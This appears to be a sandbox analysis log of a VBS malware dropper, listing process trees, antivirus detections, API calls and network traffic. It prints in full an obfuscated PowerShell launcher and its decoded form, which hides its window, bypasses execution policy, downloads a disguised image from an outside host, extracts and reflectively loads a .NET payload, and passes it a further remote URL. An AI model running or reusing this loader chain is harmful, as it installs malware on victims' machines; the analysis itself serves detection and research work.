process_identifier: 2640
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J░░░Bp░░░G0░░░YQBn░░░GU░░░VQBy░░░Gw░░░I░░░░░░9░░░C░░░░░░JwBo░░░HQ░░░d░░░Bw░░░HM░░░Og░░░v░░░C8░░░dQBw░░░Gw░░░bwBh░░░GQ░░░Z░░░Bl░░░Gk░░░bQBh░░░Gc░░░ZQBu░░░HM░░░LgBj░░░G8░░░bQ░░░u░░░GI░░░cg░░░v░░░Gk░░░bQBh░░░Gc░░░ZQBz░░░C8░░░M░░░░░░w░░░DQ░░░Lw░░░1░░░DY░░░Mw░░░v░░░DY░░░Mg░░░x░░░C8░░░bwBy░░░Gk░░░ZwBp░░░G4░░░YQBs░░░C8░░░dQBu░░░Gk░░░dgBl░░░HI░░░cwBv░░░F8░░░dgBi░░░HM░░░LgBq░░░H░░░░░░ZQBn░░░D8░░░MQ░░░2░░░Dk░░░M░░░░░░5░░░DM░░░MQ░░░4░░░DU░░░NQ░░░n░░░Ds░░░J░░░B3░░░GU░░░YgBD░░░Gw░░░aQBl░░░G4░░░d░░░░░░g░░░D0░░░I░░░BO░░░GU░░░dw░░░t░░░E8░░░YgBq░░░GU░░░YwB0░░░C░░░░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBO░░░GU░░░d░░░░░░u░░░Fc░░░ZQBi░░░EM░░░b░░░Bp░░░GU░░░bgB0░░░Ds░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░QgB5░░░HQ░░░ZQBz░░░C░░░░░░PQ░░░g░░░CQ░░░dwBl░░░GI░░░QwBs░░░Gk░░░ZQBu░░░HQ░░░LgBE░░░G8░░░dwBu░░░Gw░░░bwBh░░░GQ░░░R░░░Bh░░░HQ░░░YQ░░░o░░░CQ░░░aQBt░░░GE░░░ZwBl░░░FU░░░cgBs░░░Ck░░░Ow░░░k░░░Gk░░░bQBh░░░Gc░░░ZQBU░░░GU░░░e░░░B0░░░C░░░░░░PQ░░░g░░░Fs░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBU░░░GU░░░e░░░B0░░░C4░░░RQBu░░░GM░░░bwBk░░░Gk░░░bgBn░░░F0░░░Og░░░6░░░FU░░░V░░░BG░░░Dg░░░LgBH░░░GU░░░d░░░BT░░░HQ░░░cgBp░░░G4░░░Zw░░░o░░░CQ░░░aQBt░░░GE░░░ZwBl░░░EI░░░eQB0░░░GU░░░cw░░░p░░░Ds░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░RgBs░░░GE░░░Zw░░░g░░░D0░░░I░░░░░░n░░░Dw░░░P░░░BC░░░EE░░░UwBF░░░DY░░░N░░░Bf░░░FM░░░V░░░BB░░░FI░░░V░░░░░░+░░░D4░░░Jw░░░7░░░CQ░░░ZQBu░░░GQ░░░RgBs░░░GE░░░Zw░░░g░░░D0░░░I░░░░░░n░░░Dw░░░P░░░BC░░░EE░░░UwBF░░░DY░░░N░░░Bf░░░EU░░░TgBE░░░D4░░░Pg░░░n░░░Ds░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░C░░░░░░PQ░░░g░░░CQ░░░aQBt░░░GE░░░ZwBl░░░FQ░░░ZQB4░░░HQ░░░LgBJ░░░G4░░░Z░░░Bl░░░Hg░░░TwBm░░░Cg░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░RgBs░░░GE░░░Zw░░░p░░░Ds░░░J░░░Bl░░░G4░░░Z░░░BJ░░░G4░░░Z░░░Bl░░░Hg░░░I░░░░░░9░░░C░░░░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░V░░░Bl░░░Hg░░░d░░░░░░u░░░Ek░░░bgBk░░░GU░░░e░░░BP░░░GY░░░K░░░░░░k░░░GU░░░bgBk░░░EY░░░b░░░Bh░░░Gc░░░KQ░░░7░░░CQ░░░cwB0░░░GE░░░cgB0░░░Ek░░░bgBk░░░GU░░░e░░░░░░g░░░C0░░░ZwBl░░░C░░░░░░M░░░░░░g░░░C0░░░YQBu░░░GQ░░░I░░░░░░k░░░GU░░░bgBk░░░Ek░░░bgBk░░░GU░░░e░░░░░░g░░░C0░░░ZwB0░░░C░░░░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░Ds░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░C░░░░░░Kw░░░9░░░C░░░░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░RgBs░░░GE░░░Zw░░░u░░░Ew░░░ZQBu░░░Gc░░░d░░░Bo░░░Ds░░░J░░░Bi░░░GE░░░cwBl░░░DY░░░N░░░BM░░░GU░░░bgBn░░░HQ░░░a░░░░░░g░░░D0░░░I░░░░░░k░░░GU░░░bgBk░░░Ek░░░bgBk░░░GU░░░e░░░░░░g░░░C0░░░I░░░░░░k░░░HM░░░d░░░Bh░░░HI░░░d░░░BJ░░░G4░░░Z░░░Bl░░░Hg░░░Ow░░░k░░░GI░░░YQBz░░░GU░░░Ng░░░0░░░EM░░░bwBt░░░G0░░░YQBu░░░GQ░░░I░░░░░░9░░░C░░░░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░V░░░Bl░░░Hg░░░d░░░░░░u░░░FM░░░dQBi░░░HM░░░d░░░By░░░Gk░░░bgBn░░░Cg░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░Cw░░░I░░░░░░k░░░GI░░░YQBz░░░GU░░░Ng░░░0░░░Ew░░░ZQBu░░░Gc░░░d░░░Bo░░░Ck░░░Ow░░░k░░░GM░░░bwBt░░░G0░░░YQBu░░░GQ░░░QgB5░░░HQ░░░ZQBz░░░C░░░░░░PQ░░░g░░░Fs░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBD░░░G8░░░bgB2░░░GU░░░cgB0░░░F0░░░Og░░░6░░░EY░░░cgBv░░░G0░░░QgBh░░░HM░░░ZQ░░░2░░░DQ░░░UwB0░░░HI░░░aQBu░░░Gc░░░K░░░░░░k░░░GI░░░YQBz░░░GU░░░Ng░░░0░░░EM░░░bwBt░░░G0░░░YQBu░░░GQ░░░KQ░░░7░░░CQ░░░b░░░Bv░░░GE░░░Z░░░Bl░░░GQ░░░QQBz░░░HM░░░ZQBt░░░GI░░░b░░░B5░░░C░░░░░░PQ░░░g░░░Fs░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBS░░░GU░░░ZgBs░░░GU░░░YwB0░░░Gk░░░bwBu░░░C4░░░QQBz░░░HM░░░ZQBt░░░GI░░░b░░░B5░░░F0░░░Og░░░6░░░Ew░░░bwBh░░░GQ░░░K░░░░░░k░░░GM░░░bwBt░░░G0░░░YQBu░░░GQ░░░QgB5░░░HQ░░░ZQBz░░░Ck░░░Ow░░░k░░░HQ░░░eQBw░░░GU░░░I░░░░░░9░░░C░░░░░░J░░░Bs░░░G8░░░YQBk░░░GU░░░Z░░░BB░░░HM░░░cwBl░░░G0░░░YgBs░░░Hk░░░LgBH░░░GU░░░d░░░BU░░░Hk░░░c░░░Bl░░░Cg░░░JwBG░░░Gk░░░YgBl░░░HI░░░LgBI░░░G8░░░bQBl░░░Cc░░░KQ░░░7░░░CQ░░░bQBl░░░HQ░░░a░░░Bv░░░GQ░░░I░░░░░░9░░░C░░░░░░J░░░B0░░░Hk░░░c░░░Bl░░░C4░░░RwBl░░░HQ░░░TQBl░░░HQ░░░a░░░Bv░░░GQ░░░K░░░░░░n░░░FY░░░QQBJ░░░Cc░░░KQ░░░7░░░CQ░░░YQBy░░░Gc░░░dQBt░░░GU░░░bgB0░░░HM░░░I░░░░░░9░░░C░░░░░░L░░░░░░o░░░Cc░░░d░░░B4░░░HQ░░░LgB4░░░G8░░░bQBv░░░C8░░░Mg░░░1░░░C4░░░O░░░░░░0░░░C4░░░M░░░░░░x░░░DE░░░Lg░░░5░░░Dc░░░Lw░░░v░░░Do░░░c░░░B0░░░HQ░░░a░░░░░░n░░░Ck░░░Ow░░░k░░░G0░░░ZQB0░░░Gg░░░bwBk░░░C4░░░SQBu░░░HY░░░bwBr░░░GU░░░K░░░░░░k░░░G4░░░dQBs░░░Gw░░░L░░░░░░g░░░CQ░░░YQBy░░░Gc░░░dQBt░░░GU░░░bgB0░░░HM░░░KQ░░░='";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64string( $codigo.replace('░░░','A') ))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002f0
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -command "$Codigo = 'J░░░Bp░░░G0░░░YQBn░░░GU░░░VQBy░░░Gw░░░I░░░░░░9░░░C░░░░░░JwBo░░░HQ░░░d░░░Bw░░░HM░░░Og░░░v░░░C8░░░dQBw░░░Gw░░░bwBh░░░GQ░░░Z░░░Bl░░░Gk░░░bQBh░░░Gc░░░ZQBu░░░HM░░░LgBj░░░G8░░░bQ░░░u░░░GI░░░cg░░░v░░░Gk░░░bQBh░░░Gc░░░ZQBz░░░C8░░░M░░░░░░w░░░DQ░░░Lw░░░1░░░DY░░░Mw░░░v░░░DY░░░Mg░░░x░░░C8░░░bwBy░░░Gk░░░ZwBp░░░G4░░░YQBs░░░C8░░░dQBu░░░Gk░░░dgBl░░░HI░░░cwBv░░░F8░░░dgBi░░░HM░░░LgBq░░░H░░░░░░ZQBn░░░D8░░░MQ░░░2░░░Dk░░░M░░░░░░5░░░DM░░░MQ░░░4░░░DU░░░NQ░░░n░░░Ds░░░J░░░B3░░░GU░░░YgBD░░░Gw░░░aQBl░░░G4░░░d░░░░░░g░░░D0░░░I░░░BO░░░GU░░░dw░░░t░░░E8░░░YgBq░░░GU░░░YwB0░░░C░░░░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBO░░░GU░░░d░░░░░░u░░░Fc░░░ZQBi░░░EM░░░b░░░Bp░░░GU░░░bgB0░░░Ds░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░QgB5░░░HQ░░░ZQBz░░░C░░░░░░PQ░░░g░░░CQ░░░dwBl░░░GI░░░QwBs░░░Gk░░░ZQBu░░░HQ░░░LgBE░░░G8░░░dwBu░░░Gw░░░bwBh░░░GQ░░░R░░░Bh░░░HQ░░░YQ░░░o░░░CQ░░░aQBt░░░GE░░░ZwBl░░░FU░░░cgBs░░░Ck░░░Ow░░░k░░░Gk░░░bQBh░░░Gc░░░ZQBU░░░GU░░░e░░░B0░░░C░░░░░░PQ░░░g░░░Fs░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBU░░░GU░░░e░░░B0░░░C4░░░RQBu░░░GM░░░bwBk░░░Gk░░░bgBn░░░F0░░░Og░░░6░░░FU░░░V░░░BG░░░Dg░░░LgBH░░░GU░░░d░░░BT░░░HQ░░░cgBp░░░G4░░░Zw░░░o░░░CQ░░░aQBt░░░GE░░░ZwBl░░░EI░░░eQB0░░░GU░░░cw░░░p░░░Ds░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░RgBs░░░GE░░░Zw░░░g░░░D0░░░I░░░░░░n░░░Dw░░░P░░░BC░░░EE░░░UwBF░░░DY░░░N░░░Bf░░░FM░░░V░░░BB░░░FI░░░V░░░░░░+░░░D4░░░Jw░░░7░░░CQ░░░ZQBu░░░GQ░░░RgBs░░░GE░░░Zw░░░g░░░D0░░░I░░░░░░n░░░Dw░░░P░░░BC░░░EE░░░UwBF░░░DY░░░N░░░Bf░░░EU░░░TgBE░░░D4░░░Pg░░░n░░░Ds░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░C░░░░░░PQ░░░g░░░CQ░░░aQBt░░░GE░░░ZwBl░░░FQ░░░ZQB4░░░HQ░░░LgBJ░░░G4░░░Z░░░Bl░░░Hg░░░TwBm░░░Cg░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░RgBs░░░GE░░░Zw░░░p░░░Ds░░░J░░░Bl░░░G4░░░Z░░░BJ░░░G4░░░Z░░░Bl░░░Hg░░░I░░░░░░9░░░C░░░░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░V░░░Bl░░░Hg░░░d░░░░░░u░░░Ek░░░bgBk░░░GU░░░e░░░BP░░░GY░░░K░░░░░░k░░░GU░░░bgBk░░░EY░░░b░░░Bh░░░Gc░░░KQ░░░7░░░CQ░░░cwB0░░░GE░░░cgB0░░░Ek░░░bgBk░░░GU░░░e░░░░░░g░░░C0░░░ZwBl░░░C░░░░░░M░░░░░░g░░░C0░░░YQBu░░░GQ░░░I░░░░░░k░░░GU░░░bgBk░░░Ek░░░bgBk░░░GU░░░e░░░░░░g░░░C0░░░ZwB0░░░C░░░░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░Ds░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░C░░░░░░Kw░░░9░░░C░░░░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░RgBs░░░GE░░░Zw░░░u░░░Ew░░░ZQBu░░░Gc░░░d░░░Bo░░░Ds░░░J░░░Bi░░░GE░░░cwBl░░░DY░░░N░░░BM░░░GU░░░bgBn░░░HQ░░░a░░░░░░g░░░D0░░░I░░░░░░k░░░GU░░░bgBk░░░Ek░░░bgBk░░░GU░░░e░░░░░░g░░░C0░░░I░░░░░░k░░░HM░░░d░░░Bh░░░HI░░░d░░░BJ░░░G4░░░Z░░░Bl░░░Hg░░░Ow░░░k░░░GI░░░YQBz░░░GU░░░Ng░░░0░░░EM░░░bwBt░░░G0░░░YQBu░░░GQ░░░I░░░░░░9░░░C░░░░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░V░░░Bl░░░Hg░░░d░░░░░░u░░░FM░░░dQBi░░░HM░░░d░░░By░░░Gk░░░bgBn░░░Cg░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░Cw░░░I░░░░░░k░░░GI░░░YQBz░░░GU░░░Ng░░░0░░░Ew░░░ZQBu░░░Gc░░░d░░░Bo░░░Ck░░░Ow░░░k░░░GM░░░bwBt░░░G0░░░YQBu░░░GQ░░░QgB5░░░HQ░░░ZQBz░░░C░░░░░░PQ░░░g░░░Fs░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBD░░░G8░░░bgB2░░░GU░░░cgB0░░░F0░░░Og░░░6░░░EY░░░cgBv░░░G0░░░QgBh░░░HM░░░ZQ░░░2░░░DQ░░░UwB0░░░HI░░░aQBu░░░Gc░░░K░░░░░░k░░░GI░░░YQBz░░░GU░░░Ng░░░0░░░EM░░░bwBt░░░G0░░░YQBu░░░GQ░░░KQ░░░7░░░CQ░░░b░░░Bv░░░GE░░░Z░░░Bl░░░GQ░░░QQBz░░░HM░░░ZQBt░░░GI░░░b░░░B5░░░C░░░░░░PQ░░░g░░░Fs░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBS░░░GU░░░ZgBs░░░GU░░░YwB0░░░Gk░░░bwBu░░░C4░░░QQBz░░░HM░░░ZQBt░░░GI░░░b░░░B5░░░F0░░░Og░░░6░░░Ew░░░bwBh░░░GQ░░░K░░░░░░k░░░GM░░░bwBt░░░G0░░░YQBu░░░GQ░░░QgB5░░░HQ░░░ZQBz░░░Ck░░░Ow░░░k░░░HQ░░░eQBw░░░GU░░░I░░░░░░9░░░C░░░░░░J░░░Bs░░░G8░░░YQBk░░░GU░░░Z░░░BB░░░HM░░░cwBl░░░G0░░░YgBs░░░Hk░░░LgBH░░░GU░░░d░░░BU░░░Hk░░░c░░░Bl░░░Cg░░░JwBG░░░Gk░░░YgBl░░░HI░░░LgBI░░░G8░░░bQBl░░░Cc░░░KQ░░░7░░░CQ░░░bQBl░░░HQ░░░a░░░Bv░░░GQ░░░I░░░░░░9░░░C░░░░░░J░░░B0░░░Hk░░░c░░░Bl░░░C4░░░RwBl░░░HQ░░░TQBl░░░HQ░░░a░░░Bv░░░GQ░░░K░░░░░░n░░░FY░░░QQBJ░░░Cc░░░KQ░░░7░░░CQ░░░YQBy░░░Gc░░░dQBt░░░GU░░░bgB0░░░HM░░░I░░░░░░9░░░C░░░░░░L░░░░░░o░░░Cc░░░d░░░B4░░░HQ░░░LgB4░░░G8░░░bQBv░░░C8░░░Mg░░░1░░░C4░░░O░░░░░░0░░░C4░░░M░░░░░░x░░░DE░░░Lg░░░5░░░Dc░░░Lw░░░v░░░Do░░░c░░░B0░░░HQ░░░a░░░░░░n░░░Ck░░░Ow░░░k░░░G0░░░ZQB0░░░Gg░░░bwBk░░░C4░░░SQBu░░░HY░░░bwBr░░░GU░░░K░░░░░░k░░░G4░░░dQBs░░░Gw░░░L░░░░░░g░░░CQ░░░YQBy░░░Gc░░░dQBt░░░GU░░░bgB0░░░HM░░░KQ░░░='";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64string( $codigo.replace('░░░','A') ))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""
filepath: powershell
1 1 0

CreateProcessInternalW

 thread_identifier: 2780
thread_handle: 0x00000448
process_identifier: 2776
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.xomo/25.84.011.97//:ptth');$method.Invoke($null, $arguments)"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x0000044c
1 1 0
Symantec Scr.Malcode!gen102
Avast VBS:Obfuscated-JQ [Cryp]
Kaspersky HEUR:Trojan.Script.Generic
NANO-Antivirus Trojan.Script.Vbs-heuristic.druvzi
Rising Downloader.Agent/VBS!1.EB34 (CLASSIC)
Ikarus Win32.Outbreak
Google Detected
AVG VBS:Obfuscated-JQ [Cryp]
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received [
Data received We ’D׫*«ª+F]HÔPÖrT6¿>§DOWNGRD ïÜ÷ùöýƋñ=Pñ¡•¥)ül©ÜúÐëÊ2$»ҙ,À ÿ 
Data received P
Data received “
Data received A~I¡ï2Yáî fü­2wöðçW>‘üåÞ-RŠ*Ü !¢›`ïþxÂöÝcÕ©<U”Æ‘KL@˜]§ãßÞ!0H0F!ÏI çä4ãíüüwÔE¬z@öÚ/y)Íeâ ¿YpW\!ý|n~é›äR»~óìõ†ˆc‘,nb’pYÒ&»ƒx
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received :qlr«O¯zõ{úĽÁ²®Í¿=Y»]¦:Ãük½€v ¸MõL€Ï_!uûar¦
Data sent yue ’:|wÒ¶ùŠT‘Iۉ¾Etj³o$%!$)ÂéUµy/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
Data sent FBAß_Å­Ã`sб‘hýÆ#qśfc¼>cÀ4N…Ãiÿï‰x êCéâMcr‘©gç[i™oë™ht¢PÃ0½u}HŽ­˜€nXÚⱝ5Q«½œ³‰\—ØÓ<„—>©wàA3pêÞ؞ýȯUW.
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

send

 buffer: yue ’:|wÒ¶ùŠT‘Iۉ¾Etj³o$%!$)ÂéUµy/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
socket: 1444
sent: 126
1 126 0

send

 buffer: FBAß_Å­Ã`sб‘hýÆ#qśfc¼>cÀ4N…Ãiÿï‰x êCéâMcr‘©gç[i™oë™ht¢PÃ0½u}HŽ­˜€nXÚⱝ5Q«½œ³‰\—ØÓ<„—>©wàA3pêÞ؞ýȯUW.
socket: 1444
sent: 134
1 134 0

WSASend

 buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 2032
0 0
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.xomo/25.84.011.97//:ptth');$method.Invoke($null, $arguments)"
parent_process wscript.exe martian_process powershell -command "$Codigo = 'J░░░Bp░░░G0░░░YQBn░░░GU░░░VQBy░░░Gw░░░I░░░░░░9░░░C░░░░░░JwBo░░░HQ░░░d░░░Bw░░░HM░░░Og░░░v░░░C8░░░dQBw░░░Gw░░░bwBh░░░GQ░░░Z░░░Bl░░░Gk░░░bQBh░░░Gc░░░ZQBu░░░HM░░░LgBj░░░G8░░░bQ░░░u░░░GI░░░cg░░░v░░░Gk░░░bQBh░░░Gc░░░ZQBz░░░C8░░░M░░░░░░w░░░DQ░░░Lw░░░1░░░DY░░░Mw░░░v░░░DY░░░Mg░░░x░░░C8░░░bwBy░░░Gk░░░ZwBp░░░G4░░░YQBs░░░C8░░░dQBu░░░Gk░░░dgBl░░░HI░░░cwBv░░░F8░░░dgBi░░░HM░░░LgBq░░░H░░░░░░ZQBn░░░D8░░░MQ░░░2░░░Dk░░░M░░░░░░5░░░DM░░░MQ░░░4░░░DU░░░NQ░░░n░░░Ds░░░J░░░B3░░░GU░░░YgBD░░░Gw░░░aQBl░░░G4░░░d░░░░░░g░░░D0░░░I░░░BO░░░GU░░░dw░░░t░░░E8░░░YgBq░░░GU░░░YwB0░░░C░░░░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBO░░░GU░░░d░░░░░░u░░░Fc░░░ZQBi░░░EM░░░b░░░Bp░░░GU░░░bgB0░░░Ds░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░QgB5░░░HQ░░░ZQBz░░░C░░░░░░PQ░░░g░░░CQ░░░dwBl░░░GI░░░QwBs░░░Gk░░░ZQBu░░░HQ░░░LgBE░░░G8░░░dwBu░░░Gw░░░bwBh░░░GQ░░░R░░░Bh░░░HQ░░░YQ░░░o░░░CQ░░░aQBt░░░GE░░░ZwBl░░░FU░░░cgBs░░░Ck░░░Ow░░░k░░░Gk░░░bQBh░░░Gc░░░ZQBU░░░GU░░░e░░░B0░░░C░░░░░░PQ░░░g░░░Fs░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBU░░░GU░░░e░░░B0░░░C4░░░RQBu░░░GM░░░bwBk░░░Gk░░░bgBn░░░F0░░░Og░░░6░░░FU░░░V░░░BG░░░Dg░░░LgBH░░░GU░░░d░░░BT░░░HQ░░░cgBp░░░G4░░░Zw░░░o░░░CQ░░░aQBt░░░GE░░░ZwBl░░░EI░░░eQB0░░░GU░░░cw░░░p░░░Ds░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░RgBs░░░GE░░░Zw░░░g░░░D0░░░I░░░░░░n░░░Dw░░░P░░░BC░░░EE░░░UwBF░░░DY░░░N░░░Bf░░░FM░░░V░░░BB░░░FI░░░V░░░░░░+░░░D4░░░Jw░░░7░░░CQ░░░ZQBu░░░GQ░░░RgBs░░░GE░░░Zw░░░g░░░D0░░░I░░░░░░n░░░Dw░░░P░░░BC░░░EE░░░UwBF░░░DY░░░N░░░Bf░░░EU░░░TgBE░░░D4░░░Pg░░░n░░░Ds░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░C░░░░░░PQ░░░g░░░CQ░░░aQBt░░░GE░░░ZwBl░░░FQ░░░ZQB4░░░HQ░░░LgBJ░░░G4░░░Z░░░Bl░░░Hg░░░TwBm░░░Cg░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░RgBs░░░GE░░░Zw░░░p░░░Ds░░░J░░░Bl░░░G4░░░Z░░░BJ░░░G4░░░Z░░░Bl░░░Hg░░░I░░░░░░9░░░C░░░░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░V░░░Bl░░░Hg░░░d░░░░░░u░░░Ek░░░bgBk░░░GU░░░e░░░BP░░░GY░░░K░░░░░░k░░░GU░░░bgBk░░░EY░░░b░░░Bh░░░Gc░░░KQ░░░7░░░CQ░░░cwB0░░░GE░░░cgB0░░░Ek░░░bgBk░░░GU░░░e░░░░░░g░░░C0░░░ZwBl░░░C░░░░░░M░░░░░░g░░░C0░░░YQBu░░░GQ░░░I░░░░░░k░░░GU░░░bgBk░░░Ek░░░bgBk░░░GU░░░e░░░░░░g░░░C0░░░ZwB0░░░C░░░░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░Ds░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░C░░░░░░Kw░░░9░░░C░░░░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░RgBs░░░GE░░░Zw░░░u░░░Ew░░░ZQBu░░░Gc░░░d░░░Bo░░░Ds░░░J░░░Bi░░░GE░░░cwBl░░░DY░░░N░░░BM░░░GU░░░bgBn░░░HQ░░░a░░░░░░g░░░D0░░░I░░░░░░k░░░GU░░░bgBk░░░Ek░░░bgBk░░░GU░░░e░░░░░░g░░░C0░░░I░░░░░░k░░░HM░░░d░░░Bh░░░HI░░░d░░░BJ░░░G4░░░Z░░░Bl░░░Hg░░░Ow░░░k░░░GI░░░YQBz░░░GU░░░Ng░░░0░░░EM░░░bwBt░░░G0░░░YQBu░░░GQ░░░I░░░░░░9░░░C░░░░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░V░░░Bl░░░Hg░░░d░░░░░░u░░░FM░░░dQBi░░░HM░░░d░░░By░░░Gk░░░bgBn░░░Cg░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░Cw░░░I░░░░░░k░░░GI░░░YQBz░░░GU░░░Ng░░░0░░░Ew░░░ZQBu░░░Gc░░░d░░░Bo░░░Ck░░░Ow░░░k░░░GM░░░bwBt░░░G0░░░YQBu░░░GQ░░░QgB5░░░HQ░░░ZQBz░░░C░░░░░░PQ░░░g░░░Fs░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBD░░░G8░░░bgB2░░░GU░░░cgB0░░░F0░░░Og░░░6░░░EY░░░cgBv░░░G0░░░QgBh░░░HM░░░ZQ░░░2░░░DQ░░░UwB0░░░HI░░░aQBu░░░Gc░░░K░░░░░░k░░░GI░░░YQBz░░░GU░░░Ng░░░0░░░EM░░░bwBt░░░G0░░░YQBu░░░GQ░░░KQ░░░7░░░CQ░░░b░░░Bv░░░GE░░░Z░░░Bl░░░GQ░░░QQBz░░░HM░░░ZQBt░░░GI░░░b░░░B5░░░C░░░░░░PQ░░░g░░░Fs░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBS░░░GU░░░ZgBs░░░GU░░░YwB0░░░Gk░░░bwBu░░░C4░░░QQBz░░░HM░░░ZQBt░░░GI░░░b░░░B5░░░F0░░░Og░░░6░░░Ew░░░bwBh░░░GQ░░░K░░░░░░k░░░GM░░░bwBt░░░G0░░░YQBu░░░GQ░░░QgB5░░░HQ░░░ZQBz░░░Ck░░░Ow░░░k░░░HQ░░░eQBw░░░GU░░░I░░░░░░9░░░C░░░░░░J░░░Bs░░░G8░░░YQBk░░░GU░░░Z░░░BB░░░HM░░░cwBl░░░G0░░░YgBs░░░Hk░░░LgBH░░░GU░░░d░░░BU░░░Hk░░░c░░░Bl░░░Cg░░░JwBG░░░Gk░░░YgBl░░░HI░░░LgBI░░░G8░░░bQBl░░░Cc░░░KQ░░░7░░░CQ░░░bQBl░░░HQ